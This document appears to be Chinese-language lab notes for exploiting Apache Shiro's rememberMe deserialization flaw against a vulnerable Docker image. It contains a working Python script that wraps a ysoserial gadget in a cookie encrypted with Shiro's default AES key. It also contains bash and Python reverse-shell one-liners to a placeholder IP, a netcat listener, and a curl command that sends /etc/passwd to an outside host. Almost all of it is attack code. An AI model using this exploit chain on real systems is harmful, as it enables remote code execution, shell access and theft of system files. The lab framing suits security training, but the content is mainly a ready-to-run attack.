docker:
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1
生成payoad:
yum install maven -y
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial/
mvn package -DskipTests
cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp
yum install python3-devel
pip3 install pycryptodome
shiro.py
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
with open("/tmp/payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
python3 shiro.py "ping riuvkb.dnslog.cn"
Nc反弹shell
监听
nc -lvvp 9999
反弹
bash -i >& /dev/tcp/111.111.111.111/9999 0>&1
或者
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('111.111.111.111',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
服务器日志查看回显:
curl xxxx.cn/$(cat /etc/passwd |xargs| sed 's/ //g')